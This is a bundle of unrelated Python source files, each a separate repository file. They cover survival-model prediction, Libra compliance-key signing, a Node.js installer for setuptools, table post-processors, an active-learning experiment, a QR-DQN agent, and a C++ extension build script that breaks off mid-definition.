def predict(self, X, return_interval_probs=False):
"""
Predicts survival probabilities using the XGBoost + Logistic Regression pipeline.
Args:
X (pd.DataFrame): Dataframe of features to be used as input for the
XGBoost model.
return_interval_probs (Bool): Boolean indicating if interval probabilities are
supposed to be returned. If False the cumulative survival is returned.
Default is False.
Returns:
pd.DataFrame: A dataframe of survival probabilities
for all times (columns), from a time_bins array, for all samples of X
(rows). If return_interval_probs is True, the interval probabilities are returned
instead of the cumulative survival probabilities.
"""
# converting to xgb format
d_matrix = xgb.DMatrix(X)
# getting leaves and extracting neighbors
leaves = self.bst.predict(
d_matrix, pred_leaf=True, iteration_range=(0, self.bst.best_iteration)
)
leaves_encoded = self.encoder.transform(leaves)
# predicting from logistic regression artifacts
preds_df = self._predict_from_lr_list(
self.lr_estimators_, leaves_encoded, self.time_bins
)
if return_interval_probs:
preds_df = calculate_interval_failures(preds_df)
return preds_df
|
<reponame>gdanezis/off-chain-reference
# Copyright (c) The Libra Core Contributors
# SPDX-License-Identifier: Apache-2.0
from jwcrypto.common import base64url_encode
from cryptography.exceptions import InvalidSignature
from libra import txnmetadata, utils
from jwcrypto import jwk, jws
import json
class OffChainInvalidSignature(Exception):
    """Raised when a JWS signature fails verification or cannot be parsed."""
    pass


class IncorrectInputException(Exception):
    """Raised when an input argument is malformed."""
    pass
class ComplianceKey:
    """Wrapper around a jwcrypto Ed25519 JWK used for off-chain message
    signing/verification (JWS with EdDSA) and for Libra dual-attestation
    signatures."""
    def __init__(self, key):
        ''' Creates a compliance key from a JWK Ed25519 key. '''
        self._key = key
    def get_public(self):
        # The 'verify' op key is the public half of the key pair.
        return self._key.get_op_key('verify')
    def get_private(self):
        # The 'sign' op key is the private half; jwcrypto raises if this
        # wrapper only holds a public key.
        return self._key.get_op_key('sign')
    @staticmethod
    def generate():
        ''' Generate an Ed25519 key pair for EdDSA '''
        key = jwk.JWK.generate(kty='OKP', crv='Ed25519')
        return ComplianceKey(key)
    @staticmethod
    def from_str(data):
        ''' Generate a compliance key from a JWK JSON string. '''
        key = jwk.JWK(**json.loads(data))
        return ComplianceKey(key)
    @staticmethod
    def from_pub_bytes(pub_key_data):
        ''' Generate a compliance public key (for verification) from
        32 bytes of Ed25519 key. '''
        key = jwk.JWK(
            kty='OKP',
            crv='Ed25519',
            x=base64url_encode(pub_key_data)
        )
        return ComplianceKey(key)
    @staticmethod
    def from_pem(filename, password=None):
        # PEM import is not implemented yet; kept as a placeholder API.
        raise NotImplementedError
        #with open(filename, 'rb') as pemfile:
        #    return jwk.JWK.from_pem(pemfile.read(), password=password)
    def to_pem(self, filename, private_key=False, password=None):
        """Write the key to *filename* in PEM format; include the private
        half only when private_key is True, optionally encrypted with
        *password*."""
        data = self._key.export_to_pem(
            private_key=private_key, password=password
        )
        with open(filename, 'wb') as pemfile:
            pemfile.write(data)
    def export_pub(self):
        # JSON string containing only the public JWK members.
        return self._key.export_public()
    def export_full(self):
        # JSON string including the private JWK members.
        return self._key.export_private()
    async def sign_message(self, payload):
        # Sign *payload* (str) and return its compact JWS serialization.
        # NOTE(review): no awaits inside; presumably async to match the
        # surrounding async off-chain API — confirm before changing.
        signer = jws.JWS(payload.encode('utf-8'))
        signer.add_signature(self._key, alg='EdDSA')
        sig = signer.serialize(compact=True)
        return sig
    async def verify_message(self, signature):
        # Verify a compact JWS and return its decoded payload.
        # Raises OffChainInvalidSignature on a bad signature or malformed JWS.
        try:
            verifier = jws.JWS()
            verifier.deserialize(signature)
            verifier.verify(self._key, alg='EdDSA')
            return verifier.payload.decode("utf-8")
        except jws.InvalidJWSSignature:
            raise OffChainInvalidSignature(signature, "Invalid Signature")
        except jws.InvalidJWSObject:
            raise OffChainInvalidSignature(signature, "Invalid Format")
    def thumbprint(self):
        # RFC 7638 JWK thumbprint; a stable identifier for the key material.
        return self._key.thumbprint()
    def __eq__(self, other):
        # NOTE(review): assumes jwcrypto JWK.has_private is a property; if it
        # were a method this would compare bound methods — confirm. Also note
        # defining __eq__ without __hash__ makes instances unhashable.
        if not isinstance(other, ComplianceKey):
            return False
        return self._key.has_private == other._key.has_private \
            and self._key.thumbprint() == other._key.thumbprint()
    def sign_dual_attestation_data(self, reference_id, libra_address_bytes, amount):
        """ Sign the dual attestation message using the compliance key
        Params:
            reference_id (str)
            libra_address_bytes (bytes): the 16 bytes of sender Libra Blockchain address
            amount (int): a unsigned integer of transaction amount
        Returns ed25519 signature bytes
        """
        address = utils.account_address(bytes.hex(libra_address_bytes))
        _, dual_attestation_msg = txnmetadata.travel_rule(reference_id, address, amount)
        return self.get_private().sign(dual_attestation_msg)
    def verify_dual_attestation_data(
        self,
        reference_id,
        libra_address_bytes,
        amount,
        signature
    ):
        """
        Verify the dual attestation message given reference id, sender libra address (bytes),
        payment amount and signature
        Params:
            reference_id (str)
            libra_address_bytes (bytes): the 16 bytes of sender Libra Blockchain address
            amount (int): a unsigned integer of transaction amount
            signature (bytes): ed25519 signature bytes
        Returns none when verification succeeds.
        Raises OffChainInvalidSignature when verification fails.
        """
        address = utils.account_address(bytes.hex(libra_address_bytes))
        _, dual_attestation_msg = txnmetadata.travel_rule(reference_id, address, amount)
        try:
            self.get_public().verify(signature, dual_attestation_msg)
        except InvalidSignature:
            raise OffChainInvalidSignature(
                reference_id,
                libra_address_bytes,
                amount,
                signature
            )
|
'''Setuptools commands for working with node/npm'''
from distutils.core import Command
from distutils.errors import DistutilsError
import os
from pathlib import Path
import platform
import shutil
import subprocess
import sys
import tarfile
import urllib.request
import zipfile
from .util import chdir, RunnerMixin
class NodeCommand(Command):
    '''Base for node related commands.

    Subclasses inherit the common option definitions and the path
    resolution helpers for locating a local Node install and its
    node_modules directory.
    '''
    base_options = [
        ('node-dir=', None, 'Directory for Node install'),
        ('node-modules-dir=', None, 'Directory for node_modules')
    ]
    def resolve_path(self, path):
        # Strings become absolute Path objects; anything else passes through.
        return Path(path).resolve() if isinstance(path, str) else path
    def resolve_binary(self):
        # Prefer the Windows executable, then the POSIX binary; None if
        # neither exists yet.
        for candidate in (self.node_dir / 'node.exe',
                          self.node_dir / 'bin' / 'node'):
            if candidate.is_file():
                return candidate
        return None
    def resolve_lib(self):
        # POSIX layout (lib/node_modules) first, flat layout as fallback.
        posix_lib = self.node_dir / 'lib' / 'node_modules'
        return posix_lib if posix_lib.is_dir() else self.node_dir / 'node_modules'
    def initialize_options(self):
        # Defaults are all rooted at the current working directory.
        self.base_dir = Path('.').resolve()
        self.node_dir = self.base_dir / 'node'
        self.node = self.resolve_binary()
        self.node_lib = self.resolve_lib()
        self.node_modules = self.base_dir / 'node_modules'
    def finalize_options(self):
        # Re-resolve everything in case the user overrode the directories.
        self.node_dir = self.resolve_path(self.node_dir)
        self.node = self.resolve_binary()
        self.node_lib = self.resolve_lib()
        self.node_modules = self.resolve_path(self.node_modules)
    def node_exists(self):
        # True when a node binary was found by resolve_binary().
        return self.node is not None
class NpmInstall(NodeCommand, RunnerMixin):
    '''Command for installing packages with npm

    By default packages will be installed with ``npm install``; if the
    ``--use-ci`` argument is given, ``npm ci`` will be used instead. In
    addition the common options from `:py:class:NodeCommand` are supported.

    Usage in setup.py::

        from setuptools_node import NpmInstall
        setup(cmdclass={ 'npm_install': NpmInstall })
    '''
    description = 'Run npm install'
    user_options = NodeCommand.base_options + [
        ('use-ci', None, 'Use npm ci instead of npm install')
    ]
    def initialize_options(self):
        super().initialize_options()
        self.use_ci = None
    def finalize_options(self):
        super().finalize_options()
    def run(self):
        """Run npm install/ci, installing a local Node first if needed.

        Raises DistutilsError when npm exits with a non-zero status.
        """
        # Install a local Node first when none was found; finalize_options()
        # then re-resolves self.node and self.node_lib.
        if not self.node:
            self.run_setuptools_command(InstallNode)
            self.finalize_options()
        # BUG FIX: resolve npm-cli.js only after Node is guaranteed to be
        # installed — previously it was computed from the pre-install (and
        # possibly non-existent) node_lib path.
        npm = self.node_lib / 'npm' / 'bin' / 'npm-cli.js'
        args = [
            str(self.node.resolve()),
            str(npm.resolve()),
            'ci' if self.use_ci else 'install',
            '--scripts-prepend-node-path'
        ]
        res = subprocess.run(args)
        if res.returncode != 0:
            raise DistutilsError('Failed to run npm install')
class InstallNode(NodeCommand):
    '''Command to install a local copy of node.js

    Usage in setup.py::

        from setuptools_node import InstallNode
        setup(cmdclass={ 'install_node': InstallNode })
    '''
    description = 'Install a local copy of node.js'
    user_options = NodeCommand.base_options + [
        ('node-dist-url=', None, 'Base URL to fetch Node from'),
        ('node-version=', None, 'Version of Node to fetch'),
        ('cache-dir=', None, 'Directory to cache Node distribution files')
    ]
    def node_archive(self):
        """Map the current platform to a (filename, download URL) pair.

        Only Windows (zip) and 64-bit Linux (tar.xz) are supported; other
        platforms raise.
        """
        bits, _ = platform.architecture()
        arch = 'x64' if bits == '64bit' else 'x86'
        if sys.platform in ('win32', 'cygwin'):
            node_os = 'win'
            archive = 'zip'
        elif sys.platform in ('linux', 'linux2') and arch == 'x64':
            node_os = 'linux'
            archive = 'tar.xz'
        else:
            raise Exception('{} {} is not supported'.format(
                bits, sys.platform))
        # Official node.js artefact naming: node-<version>-<os>-<arch>.<ext>
        filename = 'node-{}-{}-{}.{}'.format(
            self.node_version, node_os, arch, archive)
        dist_url = '{}{}/{}'.format(
            self.node_dist_url, self.node_version, filename)
        return filename, dist_url
    def initialize_options(self):
        super().initialize_options()
        self.node_dist_url = 'https://nodejs.org/dist/'
        self.node_version = 'v12.14.1'
        self.cache_dir = self.base_dir / 'cache'
    def finalize_options(self):
        super().finalize_options()
        self.cache_dir = self.resolve_path(self.cache_dir)
    def node_archive_exists(self, filename):
        # True when the distribution archive is already cached locally.
        archive = self.cache_dir / filename
        return archive.is_file()
    def download_node(self, url, filename):
        """Download the Node distribution archive into the cache directory."""
        print('Downloading from {}'.format(url))
        if not self.cache_dir.is_dir():
            self.cache_dir.mkdir()
        archive = self.cache_dir / filename
        with urllib.request.urlopen(url) as response:
            with archive.open('wb') as f:
                shutil.copyfileobj(response, f)
    def install_node(self, filename):
        """Extract the cached archive and rename its top-level directory to
        the configured node_dir.

        Raises when the archive contains absolute or parent-relative paths
        (path traversal protection).
        """
        archive = self.cache_dir / filename
        # zip for Windows artefacts, tar.xz otherwise; the two classes expose
        # namelist() vs getnames() respectively.
        opener = zipfile.ZipFile if filename.endswith('.zip') else tarfile.open
        with opener(archive) as f:
            names = f.namelist() if hasattr(f, 'namelist') else f.getnames()
            # The archive wraps everything in one top-level directory.
            install_dir, _ = next(x for x in names if '/' in x).split('/', 1)
            bad_members = [
                x for x in names if x.startswith('/') or x.startswith('..')]
            if bad_members:
                raise Exception(
                    '{} appears to be malicious, bad filenames: {}'.format(
                        filename, bad_members))
            f.extractall(self.base_dir)
        with chdir(self.base_dir):
            os.rename(install_dir, self.node_dir.stem)
    def run(self):
        # Reuse an existing install; otherwise download (if not cached) and
        # extract the requested Node version.
        if self.node_exists():
            print('Using existing Node installation')
        else:
            print('Installing Node {}'.format(self.node_version))
            archive, url = self.node_archive()
            if not self.node_archive_exists(archive):
                self.download_node(url, archive)
            self.install_node(archive)
|
#!/usr/bin/env python3
import logging
from data.key import key as Key
import utils.match as match
import utils.model as model
import utils.logging
# Module-level logger named via the project's logging helper.
logger = logging.getLogger(utils.logging.getLoggerName(__name__))
def parse(output_def):
    """Return a fresh, empty container for the declared output type:
    ``{}`` when output_def['type'] is "dict", otherwise ``[]``."""
    return {} if output_def.get("type", "list") == "dict" else []
def assign(output_def, output_data):
    """Coerce *output_data* to the container type declared in *output_def*.

    For "dict" outputs: a dict passes through; a list is unwrapped to its
    first element (with a warning when it holds more than one item); any
    other type yields None with a warning. Non-"dict" output types pass
    the data through untouched.
    """
    output_data_type = output_def.get("type", "list")
    if output_data_type != "dict":
        return output_data
    if isinstance(output_data, dict):
        return output_data
    if isinstance(output_data, list):
        # BUG FIX: an empty list previously raised IndexError on [0].
        if not output_data:
            logger.warning("dict output specified, but input list was empty")
            return None
        if len(output_data) > 1:
            logger.warning(f"dict output specified, but input was of length {len(output_data)} (>1). Just using first.")
        return output_data[0]
    logger.warning(f"Could not convert output data type '{type(output_data)}' to dict")
    return None
def _inherit_row_above_if_empty(proc_def, output_data):
# output_data needs to be a list
if not isinstance(output_data, list):
logger.warning(f"Cannot run post-processor 'inherit-row-above-if-empty' on output data of type '{type(output_data)}', needs to be a list")
return output_data
# Get the key to look for
if key := proc_def.get("key"):
row_above_value = ""
for row_item in output_data:
if isinstance(row_item, dict):
if key in row_item:
if isinstance(row_item[key], str):
value = row_item[key].strip()
if value == "":
# Replace value with value from row above
row_item[key] = row_above_value
else:
# We found a value for the current row, let's remember it for future rows
row_above_value = value
return output_data
def _remove_empty_rows(proc_def, output_data):
    """Drop rows whose considered string values are all empty (as judged by
    match.is_empty), skipping any keys listed in proc_def['ignore-keys'].
    Returns the filtered list."""
    if not isinstance(output_data, list):
        logger.warning(f"Cannot run post-processor 'remove-empty-rows' on output data of type '{type(output_data)}', needs to be a list")
        return output_data
    ignore_list = proc_def.get("ignore-keys", []) if proc_def else []
    def _inner_is_empty(key, value, context):
        # A non-ignored, non-empty string marks the row as non-empty;
        # the (continue, result) tuple follows the model.recurse contract.
        if isinstance(value, str) and key.name not in ignore_list and not match.is_empty(value):
            return False, False
        return True, True
    kept = []
    for row in output_data:
        # model.recurse yields False when a non-empty value was found
        # (and None when everything was empty) — keep only the former.
        if model.recurse(row, _inner_is_empty, None) is False:
            kept.append(row)
    return kept
def _value_replace(proc_def, output_data):
# output_data needs to be a str
if not isinstance(output_data, str):
logger.warning(f"Cannot run post-processor 'value_replace' on output data of type '{type(output_data)}', needs to be a string")
return output_data
# Get the key to look for
for matches in proc_def:
if match := matches.get("match"):
if replacement := matches.get("replacement"):
if output_data == match:
output_data = replacement
break # exit early on first match
return output_data
def _extract_col_name(colname:str) -> str:
"""
Extracts all data before line boudnaries and just returns that as the column header. This allows help text to be placed in the same table cell as a column header, but ignored.
"""
if not isinstance(colname, str):
return ""
return colname.splitlines()[0]
def _remove_header_row(proc_def, output_data):
    """
    Removes the first row from the output data (must be a list). Assumes values are column header names and sets the 'colname' property on all descendant
    Keys.
    """
    # output_data needs to be a list
    if not isinstance(output_data, list):
        logger.warning(f"Cannot run post-processor 'remove-header-row' on output data of type '{type(output_data)}', needs to be a list")
        return output_data
    if len(output_data) == 0:
        logger.debug(f"Cannot run post-processor 'remove-header-row' on output data of no entries")
        return output_data
    # Get the list of col header names
    colnames = []
    for colname in output_data[0].values():
        # The value might not be a string, it might be a dictionary, but that dict should just have 1 entry
        if isinstance(colname, str):
            colnames.append(_extract_col_name(colname))
        else:
            if isinstance(colname, list) and len(colname) > 0:
                # Look at the first entry in the list, which should be a dict
                colname = colname[0]
                if isinstance(colname, dict):
                    if len(colname.values()) == 0:
                        logger.warning(f"Expected 1 column name in dict '{colname}'. Setting to empty")
                        colnames.append("")
                    else:
                        # Table rows that aren't read in as straight values but instead are processed further, can have multiple values
                        #if len(colname.values()) > 1:
                        #    logger.warning(f"Expected only 1 column name in dict '{colname}'. Using first")
                        colnames.append(_extract_col_name(list(colname.values())[0]))
                # NOTE(review): when the first list entry is not a dict,
                # nothing is appended here, so colnames can fall out of
                # alignment with the row columns — confirm intended.
            else:
                logger.warning(f"Unknown column name type of '{type(colname)}'. Setting to empty")
                colnames.append("")
    # Tag every key of every remaining row (recursively) with its column name.
    for row in output_data[1:]:
        for rowkey, rowvalue, colname in zip(row.keys(), row.values(), colnames):
            rowkey.addProperty("colname", colname)
            def _set_col_name(entry):
                # Recurse into nested lists/dicts, tagging Key instances.
                if isinstance(entry, list):
                    for e in entry:
                        _set_col_name(e)
                if isinstance(entry, dict):
                    for k, v in entry.items():
                        if isinstance(k, Key):
                            k.addProperty("colname", colname)
                        _set_col_name(v)
            _set_col_name(rowvalue)
    # Return everything except the header row.
    return output_data[1:]
# Maps the post-processor name used in output definitions to its
# implementation; process() looks handlers up here in declaration order.
post_processor_dispatch_table = {
    "inherit-row-above-if-empty":_inherit_row_above_if_empty,
    "remove-empty-rows": _remove_empty_rows,
    "value-replace": _value_replace,
    "remove-header-row": _remove_header_row
}
def process(output_def, output_data):
    """Apply the output definition to *output_data*: coerce it to the
    declared type, then run each configured post-processor in declaration
    order. Unknown post-processor names are logged and skipped.

    Returns the processed data.
    """
    logger.debug(f'Entering: Keys {output_def.keys()}')
    # FIX: the previous walrus binding ('output_type := ...') was never used;
    # only the truthiness of the lookup matters here.
    if output_def.get("type"):
        output_data = assign(output_def, output_data)
    if post_processor := output_def.get("post-processor"):
        logger.debug(f'Found post-processors {post_processor.keys()}')
        # Need to move through the post-processors in order specified in case
        # order matters for processing.
        for proc in post_processor.keys():
            if proc in post_processor_dispatch_table:
                output_data = post_processor_dispatch_table[proc](post_processor[proc], output_data)
            else:
                logger.warning(f"Could not find post-processor '{proc}'")
    logger.debug(f'Leaving: Keys {output_def.keys()}')
    return output_data
<reponame>disiji/active-assess<gh_stars>1-10
import argparse
import pathlib
import random
from collections import deque
from typing import List, Dict, Tuple, Union
from data import Dataset, SuperclassDataset
from data_utils import *
from sampling import *
import numpy as np
from tqdm import tqdm
# How often (in acquired labels) the model's MPE estimate is snapshotted.
LOG_FREQ = 10
output_dir = pathlib.Path("../output/confusion_matrix")
# Items are grouped by the model's predicted class (one arm per class).
group_method = 'predicted_class'
random.seed(1234)  # reproducible shuffling/sampling
def select_and_label(dataset: 'Dataset', sample_method: str, budget: int, costs: np.ndarray,
                     prior=None, weighted=False, topk: int = 1) -> dict:
    """Actively sample *budget* items from *dataset*, updating a
    Dirichlet-multinomial confusion-matrix model online.

    Params:
        dataset: grouped dataset providing per-group deques of items.
        sample_method: key into SAMPLE_CATEGORY ('ts' uses model rewards).
        budget: number of labels to acquire.
        costs: (num_groups, num_groups) cost matrix for the model.
        prior: Dirichlet prior counts for the model.
        weighted: whether non-'ts' sampling is weighted.
        topk: number of arms drawn per step.

    Returns a dict with 'sampled_indices' (budget,) and 'mpe_log'
    (budget // LOG_FREQ, num_groups, num_groups). (The return annotation
    previously said np.ndarray; a dict is what is actually returned.)
    """
    model = DirichletMultinomial(prior, costs, weight=dataset.weight_k)
    deques = dataset.enqueue()
    sample_fct = SAMPLE_CATEGORY[sample_method]
    # FIX: np.int was deprecated in NumPy 1.20 and later removed; the builtin
    # int maps to the same default integer dtype.
    sampled_indices = np.zeros((budget,), dtype=int)  # indices of selected data points
    mpe_log = np.zeros((budget // LOG_FREQ, dataset.num_groups, dataset.num_groups))
    pbar = tqdm(total=budget)
    idx = 0
    while idx < budget:
        if sample_method == 'ts':
            # Thompson sampling draws arms according to the model's reward.
            reward = model.reward(reward_type='confusion_matrix')
            categories = sample_fct(deques=deques, reward=reward, topk=topk)
        else:
            categories = sample_fct(deques=deques, weighted=weighted, topk=topk)
        if topk == 1 or sample_method != 'ts':
            # Normalize a single selection to a one-element list.
            categories = [categories]
        for category in categories:
            selected = deques[category].pop()  # a dictionary
            model.update(category, selected)
            sampled_indices[idx] = selected['index']
            if (idx + 1) % LOG_FREQ == 0:
                mpe_log[idx // LOG_FREQ] = model.mpe
            idx += 1
            pbar.update(1)
    pbar.close()
    return {'sampled_indices': sampled_indices,
            'mpe_log': mpe_log}
def main():
    """Run every sampling strategy on the configured dataset for the
    requested runs, persisting sampled indices and MPE logs per
    (method, run) pair under output_dir/<experiment_name>.

    Returns the artifacts of the last (method, run) combination, or
    (None, None) when no runs were configured.
    """
    if args.superclass:
        experiment_name = '%s_superclass_top%d_pseudocount%d' % (args.dataset_name, args.topk, args.pseudocount)
        dataset = SuperclassDataset.load_from_text(args.dataset_name, CIFAR100_SUPERCLASS_LOOKUP)
    else:
        experiment_name = '%s_top%d_pseudocount%d' % (args.dataset_name, args.topk, args.pseudocount)
        dataset = Dataset.load_from_text(args.dataset_name)
    dataset.group(group_method=group_method)
    if not (output_dir / experiment_name).is_dir():
        (output_dir / experiment_name).mkdir()
    budget = len(dataset)  # label the full dataset
    costs = np.ones((dataset.num_groups, dataset.num_groups))
    UNIFORM_PRIOR = np.ones((dataset.num_groups, dataset.num_groups)) / dataset.num_groups
    INFORMED_PRIOR = dataset.confusion_prior
    method_list = ['random_arm', 'random_data', 'random_arm_informed', 'random_data_informed', 'ts_uniform',
                   'ts_informed']
    # Each entry: [prior, sample_method, weighted-flag (unused for 'ts')].
    config_dict = {
        'random_arm': [UNIFORM_PRIOR * 1e-6, 'random', False],
        'random_data': [UNIFORM_PRIOR * 1e-6, 'random', True],
        'random_arm_informed': [INFORMED_PRIOR * args.pseudocount, 'random', False],
        'random_data_informed': [INFORMED_PRIOR * args.pseudocount, 'random', True],
        'ts_uniform': [UNIFORM_PRIOR * args.pseudocount, 'ts', None],
        'ts_informed': [INFORMED_PRIOR * args.pseudocount, 'ts', None]}
    # FIX: avoid NameError at the final return when the run range is empty.
    samples = mpe_log = None
    for r in range(args.run_start, args.run_end):
        # Reload the dataset so each run starts from a clean state.
        if args.superclass:
            dataset = SuperclassDataset.load_from_text(args.dataset_name, CIFAR100_SUPERCLASS_LOOKUP)
        else:
            dataset = Dataset.load_from_text(args.dataset_name)
        dataset.group(group_method=group_method)
        dataset.shuffle(r)
        for method_name in method_list:
            prior, sample_method, weighted = config_dict[method_name]
            output = select_and_label(dataset, sample_method=sample_method, budget=budget, costs=costs,
                                      prior=prior, weighted=weighted, topk=args.topk)
            samples = output['sampled_indices']  # (budget, )
            mpe_log = output['mpe_log']  # (dataset.num_groups, dataset.num_groups)
            # write samples to file
            np.save(open(output_dir / experiment_name / ('samples_%s_run%d.npy' % (method_name, r)), 'wb'), samples)
            np.save(open(output_dir / experiment_name / ('mpe_log_%s_run%d.npy' % (method_name, r)), 'wb'), mpe_log)
    return samples, mpe_log
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # FIX: argparse ignores default= on required positionals; nargs='?' makes
    # them optional so the declared defaults actually apply. Existing
    # invocations that pass all arguments behave unchanged.
    parser.add_argument('dataset_name', type=str, nargs='?', default='cifar100')
    parser.add_argument('superclass', type=str, nargs='?', default='False')
    parser.add_argument('run_start', type=int, nargs='?', default=0)
    parser.add_argument('run_end', type=int, nargs='?', default=100)
    parser.add_argument('pseudocount', type=int, nargs='?', default=1)
    parser.add_argument('topk', type=int, nargs='?', default=1)
    args, _ = parser.parse_known_args()
    # The flag arrives as text; normalize to a real boolean.
    args.superclass = args.superclass == 'True'
    main()
import tensorflow as tf
import collections
import random
import numpy as np
class QRDQN:
    """Quantile Regression DQN agent (TensorFlow 1.x graph mode) with a
    deque replay memory and a separate target network."""
    def __init__(self, sess, output_size, mainNet, targetNet, batch_size, max_length=1000000):
        # Replay buffer of [state, next_state, action_index, reward, done].
        self.memory = collections.deque(maxlen=max_length)
        self.lr = 0.00005
        self.output_size = output_size
        self.sess = sess
        self.batch_size = batch_size
        self.gamma = 0.99
        self.mainNet = mainNet
        self.targetNet = targetNet
        self.num_support = self.mainNet.num_support
        self.main_network = self.mainNet.net
        # NOTE(review): assigned the same tensor as main_network — looks like
        # it should be a distinct action-support tensor; confirm.
        self.main_action_support = self.mainNet.net
        self.main_params = self.mainNet.get_trainable_variables()
        self.target_network = self.targetNet.net
        self.target_action_support = self.targetNet.net
        self.target_params = self.targetNet.get_trainable_variables()
        # Ops that copy main-network weights into the target network.
        self.assign_ops = []
        for v_old, v in zip(self.target_params, self.main_params):
            self.assign_ops.append(tf.assign(v_old, v))
        # One-hot action taken and the per-quantile Bellman targets.
        self.action = tf.placeholder(tf.float32, [None, self.output_size])
        self.Y = tf.placeholder(tf.float32, [None, self.num_support])
        self.theta_s_a = self.main_network
        # Select the quantiles of the taken action via the one-hot mask.
        expand_dim_action = tf.expand_dims(self.action, -1)
        theta_s_a = tf.reduce_sum(self.main_network * expand_dim_action, axis=1)
        # Tile predictions and targets to form all (target, prediction)
        # quantile pairs for the pairwise quantile-Huber loss.
        theta_loss_tile = tf.tile(tf.expand_dims(theta_s_a, axis=2), [1, 1, self.num_support])
        logit_valid_tile = tf.tile(tf.expand_dims(self.Y, axis=1), [1, self.num_support, 1])
        Huber_loss = tf.losses.huber_loss(logit_valid_tile, theta_loss_tile, reduction=tf.losses.Reduction.NONE)
        # Quantile midpoints tau in (0, 1); 1e-10 avoids a zero first entry.
        tau = tf.reshape(tf.range(1e-10, 1, 1 / self.num_support), [1, self.num_support])
        inv_tau = 1.0 - tau
        tau = tf.tile(tf.expand_dims(tau, axis=1), [1, self.num_support, 1])
        inv_tau = tf.tile(tf.expand_dims(inv_tau, axis=1), [1, self.num_support, 1])
        # Asymmetric weighting: under-estimates weighted by tau, over- by 1-tau.
        error_loss = logit_valid_tile - theta_loss_tile
        Loss = tf.where(tf.less(error_loss, 0.0), inv_tau * Huber_loss, tau * Huber_loss)
        self.loss = tf.reduce_mean(tf.reduce_sum(tf.reduce_mean(Loss, axis=2), axis=1))
        self.train_op = tf.train.AdamOptimizer(learning_rate=self.lr, epsilon=1e-2/self.batch_size).minimize(self.loss)
    def train_model(self):
        # Sample a minibatch and take one quantile-regression training step;
        # returns the scalar loss.
        minibatch = random.sample(self.memory, self.batch_size)
        state_stack = [mini[0] for mini in minibatch]
        next_state_stack = [mini[1] for mini in minibatch]
        action_stack = [mini[2] for mini in minibatch]
        reward_stack = [mini[3] for mini in minibatch]
        done_stack = [mini[4] for mini in minibatch]
        done_stack = [int(i) for i in done_stack]
        # One-hot encode the stored action indices.
        onehotaction = np.zeros([self.batch_size, self.output_size])
        for i, j in zip(onehotaction, action_stack):
            i[j] = 1
        action_stack = np.stack(onehotaction)
        # Greedy next action from the target network's mean over quantiles.
        Q_next_state = self.sess.run(self.target_network, feed_dict={self.targetNet.input: next_state_stack})
        next_action = np.argmax(np.mean(Q_next_state, axis=2), axis=1)
        Q_next_state_next_action = [Q_next_state[i, action, :] for i, action in enumerate(next_action)]
        # Sorting keeps the target quantiles monotone in quantile index.
        Q_next_state_next_action = np.sort(Q_next_state_next_action)
        # Per-quantile Bellman target; terminal transitions use reward only.
        T_theta = [np.ones(self.num_support) * reward if done else reward + self.gamma * Q for reward, Q, done in
                   zip(reward_stack, Q_next_state_next_action, done_stack)]
        _, l = self.sess.run([self.train_op, self.loss],
                             feed_dict={self.mainNet.input: state_stack, self.action: action_stack, self.Y: T_theta})
        return l
    def get_action(self, state):
        # Greedy action: argmax over the mean of each action's quantiles.
        Q = self.sess.run(self.main_network, feed_dict={self.mainNet.input: state})
        Q_s_a = np.mean(Q, axis=2)
        action = np.argmax(Q_s_a, axis=1)
        return action
    def update_target(self):
        # Hard-copy main-network weights into the target network.
        self.sess.run(self.assign_ops)
    def append(self, state, next_state, action_one_hot, reward, done):
        # Store one transition in the replay buffer.
        self.memory.append([state, next_state, action_one_hot, reward, done])
|
#
# tinremote_ext_setup.py
# A tinremote extension module build script
#
import os
#from distutils.core import setup, Extension
from setuptools import setup, find_packages, Extension
# Remove the "-Wstrict-prototypes" compiler option, which isn't valid for C++.
import distutils.sysconfig
cfg_vars = distutils.sysconfig.get_config_vars()
for key, value in cfg_vars.items():
    # FIX: isinstance is the idiomatic (and subclass-safe) type check.
    if isinstance(value, str):
        cfg_vars[key] = value.replace("-Wstrict-prototypes", "")
# ==================================
# Build configuration shared by all platforms; platform-specific macros,
# libraries and paths are appended below.
with_video_data = 'WITH_VIDEO_DATA' in os.environ
BIG_ENDIAN_ARCH = [ 'sparc', 'powerpc', 'ppc' ]
macro = [ ('PYRIDE_REMOTE_CLIENT', None), ('USE_ENCRYPTION', None),
  ('NO_AUTO_DISCOVERY', None) ]
src_code = ['RemotePyModule.cpp', 'RemoteDataHandler.cpp', '../pyride_core/PyRideNetComm.cpp',
  '../pyride_core/ConsoleDataProcessor.cpp', '../pyride_core/PyRideCommon.cpp']
inc_dirs = ['../pyride_core']
lib = []
link_args = []
lib_dirs = []
# Optional video streaming support pulls in the RTP receiver sources.
if with_video_data:
  macro.append(('WITH_VIDEO_DATA', None))
  src_code = src_code + ['VideoStreamController.cpp', '../pyride_core/RTPDataReceiver.cpp']
# Platform-specific libraries, macros and search paths.
osname = os.name
if osname == 'nt':
  macro = macro + [('WIN32', None), ('WIN32_LEAN_AND_MEAN', None), ('NO_WINCOM', None)]
  lib = ['ws2_32', 'Kernel32', 'libeay32', 'advapi32', 'oleaut32', 'user32', 'gdi32', # 'legacy_stdio_definitions',
    'ucrt', 'vcruntime']
  inc_dirs = inc_dirs + ['../Windows/include']
  lib_dirs = ['../Windows/lib/release']
  link_args = []
  if with_video_data:
    macro = macro + [('CCXX_STATIC', None), ('CCXX_NAMESPACES', None)]
    lib = lib + ['ccext2', 'ccrtp1', 'ccgnu2', 'jpeg-static' ]
elif osname == 'posix':
  if with_video_data:
    lib = ['pthread', 'ccext2', 'ccrtp1', 'ccgnu2', 'crypto', 'jpeg']
    #lib = ['pthread', 'ucommon', 'commoncpp', 'ccrtp', 'crypto', 'jpeg'] #14.04 or later
  else:
    lib = ['pthread']
  # NOTE: readline() keeps the trailing newline, so myarch ends with '\n';
  # the substring checks below still work.
  f = os.popen('uname -ms')
  (myos, myarch) = f.readline().split(' ')
  f.close()
  if myos == 'Darwin' or myos.endswith( 'BSD' ):
    macro.append(('BSD_COMPAT', None))
    inc_dirs.append( '/usr/local/opt/openssl/include' )
    lib_dirs.append( '/usr/local/opt/openssl/lib' )
  elif myos == 'SunOS':
    macro.append(('SOLARIS', None))
  for arch in BIG_ENDIAN_ARCH:
    if arch in myarch:
      macro.append(('WITH_BIG_ENDIAN', None))
      break
else:
  # FIX: the original used a Python 2 print statement, which is a
  # SyntaxError under Python 3 (and had a typo in the message).
  print("unknown platform. quit")
  exit( -1 )
# The pyride_remote C++ extension assembled from the collected settings.
module1 = Extension('pyride_remote',
                    define_macros = macro,
